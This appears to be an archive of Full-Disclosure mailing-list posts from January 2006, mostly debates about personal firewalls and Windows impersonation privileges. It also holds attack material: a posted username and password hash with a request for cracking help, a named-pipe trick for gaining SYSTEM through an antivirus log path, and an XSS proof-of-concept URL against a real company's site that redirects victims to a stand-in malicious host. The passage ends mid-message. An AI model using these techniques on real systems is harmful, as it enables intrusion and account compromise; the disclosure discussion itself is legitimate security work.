[Full-disclosure] Hash Type?
Can someone please tell me if these are DES hashes, or if they could be oracle hashes? I cannot get JTR to crack them, which leades me to believe they may not be DES. Any help please? Username: UCN016 Password Hash: 8F789BA55BA187380BA1 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Question for the Windows pros
Hello, The ImpersonateNamedPipeClient() risks have been fully documented by Blake Watts back in 2002. http://www.blakewatts.com/namedpipepaper.html The problem is basically that OpenFile() will accept either : - A file path (C:\toto.txt) - A share path (\\hacker\toto) - A named pipe path (\\hacker\pipe\toto) (Did you ever notice that you cannot create a share named pipe on a Windows system ? ;) So if you can open a file with a privileged application (such as a SYSTEM service), you can gain the privileges of the application. Real life example: take your antivirus, change the log file name from C:\Program Files\Antivirus\log.txt to \\mycomputer\pipe\toto while running a listener on the toto pipe. When the antivirus opens the log file, you become SYSTEM. Regards, - Nicolas RUFF Security Researcher @ EADS-CRC ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] overflow protection software ?
anybody know some software like stackdefender which do the overflow protection ? Hello, From the PaX homepage : - BufferShield http://www.sys-manage.com/index10.htm You might also be interested in those products, which are not using the same technologies, but aiming at the same goal: - Wehntrust http://www.wehnus.com/products.pl - Ozone http://www.securityarchitects.com/ - Cisco Secure Agent (stack walking and more) http://www.cisco.com/en/US/products/sw/secursw/ps5057/ - McAfee Entercept (idem) http://www.mcafee.com/us/products/mcafee/host_ips/standard_edition.htm - SkyRecon StormShield http://www.skyrecon.com/products.html And many more I suppose ... Regards, - Nicolas RUFF Security Researcher @ EADS-CRC ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] MBT Xss vulnerability
Hii List; Recently, i found an Xss vulnerabilty in MBT web site. MBT offers services from Consulting to Managed Services.It is the Corporate member of The International Systems Security Engineering Association (ISSEA). BS 7799 (Information Security Management Framework) certified organization Vulnerability: MBT XSS (Cross Site Scripting) Attacks Criticality: Medium Description: MBT (http://www.mahindrabt.com/website/index.htm ) is a leading India-based global IT solutions provider. As a proven leader in application outsourcing and offshoring of business critical applications, MBT enables its clients, protect their investment in legacy systems, enhance capital budgets, reduce operating expenses and build solutions for the multi-services future. However it suffers Xss vulnerability on its own web page. Below is the proof-of-concept which explains this - http://www.mahindrabt.com/jse/jsp/search.jsp?q=[Xss malcode here] Re-directing the site to any malicious or fake site to trap the victim : http://www.mahindrabt.com/jse/jsp/search.jsp?q= scriptdocument.location='http://www.[evil.site].com'/script Though it does not affect sever side alot and may seem harmless, but it can be used to target college students or job-seekers as it is one of the most attracting employer. Targets can be lured to visit the malicious weblink under the pretext of some job positions being vacant. Vendor notification: Vendor has been notified twice, around 4 months ago but still there is no response and I guess neither they are going to respond. Regards; Santosh J. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] MBT Xss vulnerability
What a lame vulnerability it is. If your POC redirects to another site (which is not MBT site), how someone will become victim and believe that he/she is doing business with MBT? Your post is yet another proof that FD is more and more inhibited by scipt kiddies. Get a life! On 1/19/06, MuNNa [EMAIL PROTECTED] wrote: Hii List;Recently, i found an Xss vulnerabilty in MBT web site. MBT offers services from Consulting to Managed Services.It is the Corporate member of The International Systems Security Engineering Association (ISSEA). BS 7799 (Information Security Management Framework) certified organizationVulnerability: MBT XSS (Cross Site Scripting) Attacks Criticality: MediumDescription:MBT ( http://www.mahindrabt.com/website/index.htm ) is a leading India-based global IT solutions provider. As a proven leader in application outsourcing and offshoring of business critical applications, MBT enables its clients, protect their investment in legacy systems, enhance capital budgets, reduce operating expenses and build solutions for the multi-services future. However it suffers Xss vulnerability on its own web page. Below is the proof-of-concept which explains this - http://www.mahindrabt.com/jse/jsp/search.jsp?q=[Xss malcode here]Re-directing the site to any malicious or fake site to trap the victim : http://www.mahindrabt.com/jse/jsp/search.jsp?q= scriptdocument.location='http://www.[evil.site].com'/script Though it does not affect sever side alot and may seem harmless, but it can be used to target college students or job-seekers as it is one of the most attracting employer. Targets can be lured to visit the malicious weblink under the pretext of some job positions being vacant. Vendor notification: Vendor has been notified twice, around 4 months ago but still there is no response and I guess neither they are going to respond. Regards;Santosh J.___ Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Re: PC Firewall Choices
Nic Werner wrote in news:[EMAIL PROTECTED] On 1/17/06, Greg [EMAIL PROTECTED] wrote: -Original Message- From: full-disclosure-bounces@ On Behalf Of Nic Werner Sent: Wednesday, 18 January 2006 10:05 AM ZoneAlarm - gets in the way, and hard to diagnose problems. You end up turning it off because it never remembers your settings and you can't trust it. Rubbish. Sure it gets in the way. It is MEANT to get in the way. If you close it down, it is likely because you don't know how to drive it. The prog CAN be a little hard to newbies to understand if you want to go internet banking etc but people on this list ought to know how to handle it. Getting in your way as opposed to letting you get work done are two different things. Kerio does a great job of popping up and explaining what is happening while I've seen more people confused by ZA and its dialogs No, we've turned ZA off as web sites or programs won't load (Ciscoworks, nGenius, etc) and even though we've checked the logs of ZA, nothing shows as being blocked. Turn it off and everything magically works. I will never run the bloat that is ZA. I'd like to second what Greg says. I've used ZA for years, through many changes of version. It's never forgotten its settings for me. It's never blocked anything it shouldn't or not blocked anything it should. It's not remotely bloated compared to similar packages like anything Norton/Symantec/McAfee[*] Nor do I find a dialog such as Should internet explorer be allowed to connect to the internet at all confusing. So I'm convinced the problem exists between chair and keyboard. Can you actually back up your claims? For example, can you describe a simple procedure, that anyone with ZA installed could try out, that shows it to misbehave? Or do you have detailed notes that you took at the time one of these problems occurred that shows the symptoms you observed and the steps you took to attempt to diagnose and solve the problem? Or can we just expect to hear No, I didn't know what was going on, I didn't keep proper notes, I was in a rush and just needed to get things working so I didn't investigate? In which case it would be false to claim that you knew ZA to be the cause of the problem, rather than either pilot error or a faulty PC or any number of other confounding factors that could arise? I hear people slagging off ZA quite often, but not one of them has ever been able to actually demonstrate a real problem or even explain what the problem is in terms any more precise then Uh I dunno it just went wrong. cheers, DaveK [*] which I consider to be the gold standard for lousy, bloated, buggy, faulty software. -- Can't think of a witty .sigline today ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Re: Re: Security Bug in MSVC
Jason Coombs wrote in news:[EMAIL PROTECTED] Dave Korn wrote: Nice thinking, Donnie. This must be the new class of vulnerability that was hinted at by Microserfs a few months ago... The attacks are launched by way of source code distributions rather than binary code. Why is this a terrible insecure microsoftism, when GNU make does exactly the same? Just after Donnie reported this issue to Microsoft (September) we started seeing Microserfs suggest that their security team was working on a never-before-encountered novel class of vulnerability, And for some reason you assume that this was the often-before-encountered and non-novel vulnerability that you had just reported, rather than any of the presumably million-and-one vulnerabilities of varying levels of seriousness or insignificance that they are routinely having reported and dealing with? -- since it would be politically valuable for Microsoft to be able to claim that sharing source code is an unsafe behavior, and since there have been no other vulnerabilities disclosed since that time which might have appeared to Microsoft to be entirely new and far-reaching, I suspect that this disclosure prompted those previous statements about work being done by Microsoft. Well, that's a massive assumption. For a start, there's nothing new about it - remember the trojaned configure scripts? For a continuance, maybe they're just still working on this whatever-it-is? and the implication was that Microsoft's security competency had finally surpassed both the black hats and all other white hat groups Heh. Any possible reputation M$ might have been hoping to acquire for security comptency has been *utterly* blown out of the water by the WMF bug. After all, they had this big refocusing, after slammer, and audited all their code and started putting security first and foremost, remember? Heh, yeh, sure they did. It's a stunning indictment of the worth of M$'s code audit that they had this accept-a-pointer-to-code-from-a-file design flaw right out there in the open beneath their noses and they didn't even see what was in front of them. Presumably the rest of their audit can be assumed to have been equally thorough! How many other attacks can you point to where Microsoft's development tools are exploited to specifically target the unwary programmer who still thinks it's perfectly safe to download arbitrary data from an untrusted source and then open it in a text editor? Umm, perhaps if you think that Dev Studio is a text editor, that would explain your misunderstandings. My question to you is, what kind of programmer doesn't know that building code involves running all sorts of arbitrary executables with arbitrary data? And in any case, opening the data in dev studio *is* entirely safe. The batch commands aren't executed unless you choose the relevant menu commands or f-key to build the project. Of course, you know perfectly well that it's safe to simply _open_ the file, and you know perfectly well that DevStudio is FAR more than a text editor, so I must assume the above paragraph to have been dishonest rhetoric/polemic rather than a serious line of argument. My guess is that Donnie got Microsoft thinking about this very risk, and they started talking internally about it being an entirely new class of vulnerability. Yes, if my supposition is correct it would be quite pathetic and give us another reason to laugh at Microsoft; but you can probably see how much benefit Microsoft is going to be able to milk out of this and related attacks that exploit bugs in programmers' tools that are launched by the simple act of opening or attempting to compile a source code distribution. Well, you can't run *anything* with arbitrary data and expect to be safe. Except, of course, a plain, no-features-no-frills ASCII text editor. Source code is just as dangerous as binary code. Absolutely. Clearly, the only way to be safe is to rely on Microsoft's programmers to create and digitally-sign software for us. Go Microsoft. Yeah! Well, I suppose it's conceivable that M$ are attempting a massive FUD over nothing, but I think they'd want at least a *bit* more substance to back up the pure hype... cheers, DaveK -- Can't think of a witty .sigline today ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Re: Question for the Windows pros
Paul Schmehl wrote in news:[EMAIL PROTECTED] This is incorrect. The privilege exists *and* functions on the Workstation operating systems Win2000 SP4 *and* WinXP. I have verified this through testing. Yes, there's nothing new about impersonation, it's been there all the way back to NT. I've already been there and read the page - several times. I understand *in general* what an impersonation privilege is. I need to know *specifically* what server's clients can be impersonated when this privilege is applied to an account. So far, I've found nothing on the web that even attempts to address that issue. Unfortunately, it has not. Again, I understand *in general* what impersonation is, how it works and what it can mean in terms of security. I am looking *specifically* for what a user who has the privilege Impersonate a client after authentication has the right to do. Does it mean that *anything* that user runs runs under his/her privileges? Does it mean only *local* processes are affected? Does it mean a hacker can access the machine remotely and run under the user's privileges? IOW, if I have a domain account name Joe, and I grant Joe this privilege, what is placed at risk? The local machine he's logged in to? The entire domain? Only certain services? Saying it's a high risk (like ISS does) and then not defining *precisely* what the risks are is not helpful. And all I was really asking for is pointers to any white papers or conference presentations that even attempt to illuminate this issue. It's looking like there are none. The info is out there, but it's scattered across a combination of MSDN, WDJ, OSR and similar sources. I started writing a full explanation yesterday when you posted this. I'll try and finish it off when I get home from work this evening. cheers, DaveK -- Can't think of a witty .sigline today ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Re: Question for the Windows pros
Paul Schmehl wrote in news:[EMAIL PROTECTED] Oh, alright, just one more, then I'll leave it until I've finished my essay. The spyware has to bring the credentials with it. The user doesn't *have* the credentials. It *gets* them from the process in question. That's a bit different. The user has the right to impersonate within the context of a process. The process must already have the credentials to elevate, or the user gets nothing (if I'm understanding impersonation correctly.) You aren't, sorry! This is in fact almost exactly back-to-front: the user *does* have credentials, and processes inherit their credentials from the user who launches the process. cheers, DaveK -- Can't think of a witty .sigline today ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerability/Penetration Testing Tools
Interesting, How is it that I start a thread on penetration testing tools... and it evolves to Trademark -Adriel -Original Message- From: Yvan Boily [EMAIL PROTECTED] To: [EMAIL PROTECTED] [EMAIL PROTECTED] Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Sent: Tue, 17 Jan 2006 23:12:09 -0600 Subject: Re: [Full-disclosure] Vulnerability/Penetration Testing Tools The adwords/trademark issue on Google has seen its day in court. Kind of interesting: http://www.google.ca/search?hl=enq=google+geico+lawsuitmeta= On 1/17/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: I think its up for debate. Business and ethics aren't one in the same. -Original Message- From: Gadi Evron [EMAIL PROTECTED] To: H D Moore [EMAIL PROTECTED] Cc: full-disclosure@lists.grok.org.uk full-disclosure@lists.grok.org.uk Sent: Wed, 18 Jan 2006 02:20:31 +0200 Subject: Re: [Full-disclosure] Vulnerability/Penetration Testing Tools H D Moore wrote: You should check out the Metasploit Framework: - http://metasploit.com/projects/Framework/ rant When I viewed the online demo of SAINT Exploit in December of 2005, nearly all of their exploit modules had names very similar to the ones found in version 2.5 of the Metasploit Framework. The demo has been updated since then and a handful of new exploits have been mixed in while others had their name changed. Oh, and their placement of a Google Adword on metasploit was a nice touch... /rant Speaking of Google.. I had the unfortunate fortune of working on an ad campaign recently. It brought to the fore many questions.. some of them were about this. If I put an adword on symantec, don't I breach their trademark, or Google does? I doubt anyone would sue Google to find out, or be in courts for so long it won't matter any longer. Annoying, but works both ways. Gadi. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Check Out the new free AIM(R) Mail -- 2 GB of storage and industry-leading spam and email virus protection. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- ygjb Computer Science is no more about computers than astronomy is about telescopes. E. W. Dijkstra Check Out the new free AIM(R) Mail -- 2 GB of storage and industry-leading spam and email virus protection. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Startup company
Well, Having run my own business for many years I can tell you that you need an education in business. If not, you will get your education with the first attempt at running your own, but you will fail. Runnining a business is much more than simply understanding technology. You also need to understand the market, the clients wants and sometimes the clients needs. Often times needs and wants are not in line. Anyway... I could talk and talk on this... take some business courses. -Adriel -Original Message- From: Yvan Boily [EMAIL PROTECTED] To: Shyaam [EMAIL PROTECTED] Cc: full-disclosure@lists.grok.org.uk Sent: Tue, 17 Jan 2006 23:13:48 -0600 Subject: Re: [Full-disclosure] Startup company Good luck! Hope 'your friend' has alot of RD dollars set aside! On 1/17/06, Shyaam [EMAIL PROTECTED] wrote: Hello All, My friend is starting a new company for providing Anti-reversing security and related to forensics. Can someone give some tips and guidance. Thank you Shyaam ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- ygjb Computer Science is no more about computers than astronomy is about telescopes. E. W. Dijkstra ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Check Out the new free AIM(R) Mail -- 2 GB of storage and industry-leading spam and email virus protection. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] PC Firewall Choices
Bullguard is like that too... not sure how it compares to Kapersky, but it is pretty neat IMHO. -Adriel -Original Message- From: Nancy Kramer [EMAIL PROTECTED] To: Steven [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Sent: Wed, 18 Jan 2006 04:22:52 -0500 Subject: Re: [Full-disclosure] PC Firewall Choices I have limited experience with PC Firewalls but the nicest one I have seen is the one that comes with Kaspersky anti virus. It appeared to be very easy to configure and never seems to cause problems with legitimate applications accessing the web. I do know that it does not meet your requirements since it comes bundled with anti virus, although if I remember correctly one could pick which of their bundled components to install at install time. Regards, Nancy Kramer At 03:22 PM 1/17/2006, Steven wrote: I am looking at supplementing the Windows XP (Pro) SP2 Firewall with a third party product on a bunch of Windows machines. I am trying to determine what product to go with and wanted to solicit some opinions from this mailing list. The four that I really come across and have used in some cases are ZoneAlarm, Sygate, Norton, Kerio, and Tiny. My understanding is that Norton has actually acquired Sygate and that the Sygate Personal Firewall probably wouldn't be the best choice of these now. With that in mind I am looking for a product that easy to setup, easy to use, works well, and does not take up too much in terms of system resources or harddrive space ( I also don't want it to add 20 minutes to the boot process either). I am not looking for e-mail protection, anitivrus, or any other non-firewall type services to be included. I do however want it to be able to manage applications and their internet usage. (i.e. if they install something new that tries to access the web (trojans included) they will get a popup telling them something is doing this). Any suggestions and opinions on the above products and any others that I might not have mentioned are welcomed. Also -- on top of this if someone knows of software/hardware that can scan these machines and verify whether or not both the SP2 FW and/or the 3rd part FW -- and perhaps prevent them network access if they are not running -- please let me know. [I am not sure what security products have these capabilities] Thanks Steven ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- No virus found in this incoming message. Checked by AVG Anti-Virus. Version: 7.1.375 / Virus Database: 267.14.19/231 - Release Date: 1/16/2006 -- No virus found in this outgoing message. Checked by AVG Anti-Virus. Version: 7.1.375 / Virus Database: 267.14.19/231 - Release Date: 1/16/2006 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Check Out the new free AIM(R) Mail -- 2 GB of storage and industry-leading spam and email virus protection. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Re: Question for the Windows pros
Paul Schmehl wrote in news:[EMAIL PROTECTED] This is how I understand the process: 1) Joe, who is a User, launches the custom installer (through a login script) 2) The install process begins running under Joe's credentials (User) 3) At some point in the install process, elevated privileges are required to continue 4) Joe doesn't have them, but he has the Impersonate privilege. 5) Joe's process requests the credentials embedded in the custom installer No. They aren't embedded in the installer. They are the credentials belonging to another process, to which the impersonator is connected, via a pipe or LPC port, that the impersonator holds the server end of. 6) Joe's process uses those credentials to complete the install, then relinquishes them This means that the exposure, when granting the privilege, is as follows: 1) If you can launch a process on the local machine AND 2) The process has embedded credentials that are different from the user launching the process THEN 3) The user gains those credentials' privileges ***for the length of that process*** It is indeed the case that a process that is impersonating cannot pass on the impersonated credentials to a child process. However, credentials are not embedded in processes, or in executables; ultimately, they come from the SAM or AD. From a hacker standpoint, this means that you would already need elevated privileges in order to take advantage of the user's right to impersonate. This is a fairly low risk. So, why did M$ decide to remove this right from the user? Because it prevents them from installing software on the box. It could in theory be abused to escalate privileges. OK, shoot holes in my theory. As I said in another post in this thread, I'm writing a fuller explanation that I'll post later when I get time to finish it up. cheers, DaveK -- Can't think of a witty .sigline today ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Re: PC Firewall Choices
On 1/19/06, Dave Korn [EMAIL PROTECTED] wrote: I'd like to second what Greg says. I've used ZA for years, through many changes of version. It's never forgotten its settings for me. It's never blocked anything it shouldn't or not blocked anything it should. Really? Do you just run notepad? I've had to remove it on several machines because it blocked the launch of certain applications despite there being no rules to do so. This includes (to my recollection this was some months ago) some popular tax software updating features, adobe acrobat plugin stoppped working within IE even though it was configured to, and numerous other problems that couldn't be tracked to any rules. It's not remotely bloated compared to similar packages like anything Norton/Symantec/McAfee[*] Symantec is hugely bloated, but on a 1.2 GHz machine I have here, when ZA is installed web browsing with IE is slowed down very noticably, far more than average Norton System Works install causes. Nor do I find a dialog such as Should internet explorer be allowed to connect to the internet at all confusing. Neither does anyone else in this thread, you just presume we're all lusers who can't read english or configure simple software. So I'm convinced the problem exists between chair and keyboard. Your wild assumptions that because you've never had a problem that anyone who does must be an idiot is astounding...do you teach? Try using google you'll found thousands of ZA problems, not all imagined. Can you actually back up your claims? For example, can you describe a simple procedure, that anyone with ZA installed could try out, that shows it to misbehave? Or do you have detailed notes that you took at the time one of these problems occurred that shows the symptoms you observed and the steps you took to attempt to diagnose and solve the problem? Having uninstalled it, deleted the executable, and wiped my free space. No. Or can we just expect to hear No, I didn't know what was going on, I didn't keep proper notes, I was in a rush and just needed to get things working so I didn't investigate? In which case it would be false to claim It's clearly the problem if it degrades system performance, some apps fail to load, and all this goes away when is disabled. And who the hell takes notes on every piece of software they install and remove because its buggy? Please we'd all have a set of encyclopedia-sized notes for Windows problems alone. that you knew ZA to be the cause of the problem, rather than either pilot error or a faulty PC or any number of other confounding factors that could arise? It's easy to know, because when you uninstall it suddenly things are much smoother and your heart rates go back down. I hear people slagging off ZA quite often, but not one of them has ever been able to actually demonstrate a real problem or even explain what the problem is in terms any more precise then Uh I dunno it just went wrong. Just because someone doesn't take notes every time some piece of shit software doesn't work as advertised and uninstall it, doesn't make what they say any less true. Why would I install something just to prove it causes problems to satisfy the ego of someone who thinks because something works for them it must be perfect for everyone. It would be fruitless. If you can't find anyone reporting real problems with ZA then maybe you should browse your way over to www.google.com and do a search. cheers, DaveK [*] which I consider to be the gold standard for lousy, bloated, buggy, faulty software. -- Can't think of a witty .sigline today I have a sigline for you: ZA is in my mouth. Stop sucking. Why isn't it friday yet, -sb ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Re: PC Firewall Choices
As cruel as that last message was I'm sick of the ZA pros here saying its perfect, its not, far from it. But I forgot to mention it beats Symantec's firewall hands down. Symantec Personal Firewall I've found from many different versions the same horrible inconsistencies in my experience installing it for a family member. For example: 1) In the 2004 iteration of NPF it would simply stop working at times. Basically it would just completely stop working and would prevent the lauch of even trusted applications. The only solution was to reset and pray it didn't happen again soon. 2) Even though Opera was fully conifgured in the rules (tried manually and automatic scan option), it would only launch half the time. NPF would block it from launching despite its own rules. It did this selectively with different applications. Sometimes it was just Opera, other times IE or Firefox would not open either. Killing the firewall service would make this go away. The above alone was enough to drive you nuts. NPF acted the above way after several reinstalls and even the formatting of the drive and reinstallation of Windows had no affect on its buggy ways. 2005 edition was no better. The 1st problem mentioned above didn't seem to happen with 2005, but the second problem continued unabated. It's like NPF would just decide on its own it didn't like a particular app or rule. It is relatively easy to configure, though finding exactly what you're looking for in the settings can be a pain at times. Best Regards, sb On 1/19/06, Stan Bubrouski [EMAIL PROTECTED] wrote: On 1/19/06, Dave Korn [EMAIL PROTECTED] wrote: I'd like to second what Greg says. I've used ZA for years, through many changes of version. It's never forgotten its settings for me. It's never blocked anything it shouldn't or not blocked anything it should. Really? Do you just run notepad? I've had to remove it on several machines because it blocked the launch of certain applications despite there being no rules to do so. This includes (to my recollection this was some months ago) some popular tax software updating features, adobe acrobat plugin stoppped working within IE even though it was configured to, and numerous other problems that couldn't be tracked to any rules. It's not remotely bloated compared to similar packages like anything Norton/Symantec/McAfee[*] Symantec is hugely bloated, but on a 1.2 GHz machine I have here, when ZA is installed web browsing with IE is slowed down very noticably, far more than average Norton System Works install causes. Nor do I find a dialog such as Should internet explorer be allowed to connect to the internet at all confusing. Neither does anyone else in this thread, you just presume we're all lusers who can't read english or configure simple software. So I'm convinced the problem exists between chair and keyboard. Your wild assumptions that because you've never had a problem that anyone who does must be an idiot is astounding...do you teach? Try using google you'll found thousands of ZA problems, not all imagined. Can you actually back up your claims? For example, can you describe a simple procedure, that anyone with ZA installed could try out, that shows it to misbehave? Or do you have detailed notes that you took at the time one of these problems occurred that shows the symptoms you observed and the steps you took to attempt to diagnose and solve the problem? Having uninstalled it, deleted the executable, and wiped my free space. No. Or can we just expect to hear No, I didn't know what was going on, I didn't keep proper notes, I was in a rush and just needed to get things working so I didn't investigate? In which case it would be false to claim It's clearly the problem if it degrades system performance, some apps fail to load, and all this goes away when is disabled. And who the hell takes notes on every piece of software they install and remove because its buggy? Please we'd all have a set of encyclopedia-sized notes for Windows problems alone. that you knew ZA to be the cause of the problem, rather than either pilot error or a faulty PC or any number of other confounding factors that could arise? It's easy to know, because when you uninstall it suddenly things are much smoother and your heart rates go back down. I hear people slagging off ZA quite often, but not one of them has ever been able to actually demonstrate a real problem or even explain what the problem is in terms any more precise then Uh I dunno it just went wrong. Just because someone doesn't take notes every time some piece of shit software doesn't work as advertised and uninstall it, doesn't make what they say any less true. Why would I install something just to prove it causes problems to satisfy the ego of someone who thinks because something works for them it must be perfect for everyone. It would be fruitless.
Re: [Full-disclosure] Re: PC Firewall Choices
On Thu, 19 Jan 2006 14:36:33 GMT, Dave Korn said: I hear people slagging off ZA quite often, but not one of them has ever been able to actually demonstrate a real problem or even explain what the problem is in terms any more precise then Uh I dunno it just went wrong. troll I don't know. Computer software that continually just goes wrong rather than explaining the failure in terms the intended user can understand sounds... flawed. ;) /troll pgpYk4VvAXa1Z.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Question for the Windows pros
--On Thursday, January 19, 2006 08:20:37 +0100 Bernhard Mueller [EMAIL PROTECTED] wrote: Hello, The ImpersonateClient API does not require that credentials are embedded into the program. A call to ImpersonateClient allow a server to impersonate the client when it receives a local connection, e.g. via a named pipe. It is mostly used by servers to DROP their privileges to that of the connecting user if they are running with administrative privileges. A security issue with ImpersonateClient arises if there's no error checking on the ImpersonateClient call and the process runs without realizing that it is still SYSTEM. Another issue would be an unprivileged client with the ImpersonateClient privilege, if an attacker manages to make a process with admin rights connect to that client. This is why normal users do not have this right by default. When you say manages to make a process with admin rights connect, you are referring to the Local Administrator account on the machine in question, correct? So far, from what I understand, granting this privilege to a User means that *if* a process with higher privileges can connect to the computer in question, the User's privileges will be elevated through impersonation. If this is the case, then the security risk is minimal, I would think. I would welcome suggestions regarding scenarios where this could be used to exploit a box. ISTM if the connecting process already has the admin rights, elevating the User's rights through impersonation merely elevates the User to the same level of privilege that the process already has. Paul Schmehl ([EMAIL PROTECTED]) Adjunct Information Security Officer University of Texas at Dallas AVIEN Founding Member http://www.utdallas.edu/ir/security/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Question for the Windows pros
--On Thursday, January 19, 2006 10:32:44 +0100 Nicolas RUFF [EMAIL PROTECTED] wrote: The ImpersonateNamedPipeClient() risks have been fully documented by Blake Watts back in 2002. http://www.blakewatts.com/namedpipepaper.html Does the Impersonate a client after authentication privilege grant the account access to ImpersonateNamedPipeClient? Paul Schmehl ([EMAIL PROTECTED]) Adjunct Information Security Officer University of Texas at Dallas AVIEN Founding Member http://www.utdallas.edu/ir/security/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Re: Question for the Windows pros
--On Thursday, January 19, 2006 15:01:49 + Dave Korn [EMAIL PROTECTED] wrote: As I said in another post in this thread, I'm writing a fuller explanation that I'll post later when I get time to finish it up. I'll wait for your paper before asking any further questions. Thanks. Paul Schmehl ([EMAIL PROTECTED]) Adjunct Information Security Officer University of Texas at Dallas AVIEN Founding Member http://www.utdallas.edu/ir/security/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Question for the Windows pros
Applying the Principle of Least Privilege to User Accounts on Windows XP http://www.microsoft.com/technet/prodtechnol/winxppro/maintain/luawinxp.mspx /JA ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] PC Firewall Choices
All very good points. I am not certain as to how viable of an option this idea would be, but what about a totally R/O firewall after configuration? Incorporate some sort of memory protection into that, such as stack and heap protection. You'd then have a pretty secure firewall... but then again... if its passing traffic to an insecure box... you're screwed anyway. -Adriel -Original Message- From: Juliao Duartenn [EMAIL PROTECTED] To: [EMAIL PROTECTED] Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Sent: Wed, 18 Jan 2006 10:28:51 + Subject: Re: [Full-disclosure] PC Firewall Choices On Tue, 2006-01-17 at 23:33 -0500, [EMAIL PROTECTED] wrote: Thats assuming that malware isn't being designed for that firewall. I'm sure you already know that software is software regardless of the hardware that it is running on. Likewise a vulnerability is still a vulnerability... I suppose you could r/o the system... but you need to write the confs somewhere right? -Adriel Configuration on a hardware firewall is usually a pretty stable thing - you don't go around opening ports at random every day, now do you? Most modern {linux|bsd} firewall implementations can now run from a read-only device, namely CD-ROM, and also write their configuration to a removable device that you can manually set RW or RO - floppy, USB pen, etc. Of course, since most implementations mount parts of the filesystem into RAM, you're still vulnerable to attacks, they are merely non-permanent, if you reboot you are clean again, albeit with the original hole still present, i'd say. There are, of course, solutions for that too, but I still haven't seen one that really works - meaning that it can detect and prevent tampering in real-time. The best thing I can remember is running tripwire against a RO database on CD, but that can still be tampered with. Any thoughts? Juliao -Original Message- From: [EMAIL PROTECTED] To: Nick Hyatt [EMAIL PROTECTED] Cc: full-disclosure@lists.grok.org.uk Sent: Tue, 17 Jan 2006 21:08:39 -0500 Subject: Re: [Full-disclosure] PC Firewall Choices On Tue, 17 Jan 2006 18:59:52 MST, Nick Hyatt said: Given the choice between one of those selections and a standard Linksys router / firewall combo, wouldn't it be safer to go with the hardware firewall? I find the configuration options to be quite a bit more in-depth, and the hardware firewall doesn't get itself as stuck in the system as say, ZA does. Even more important, a hardware firewall can't be compromised as easily by malware that's on a host behind the firewall. It's easy for a program on a PC to tell ZA 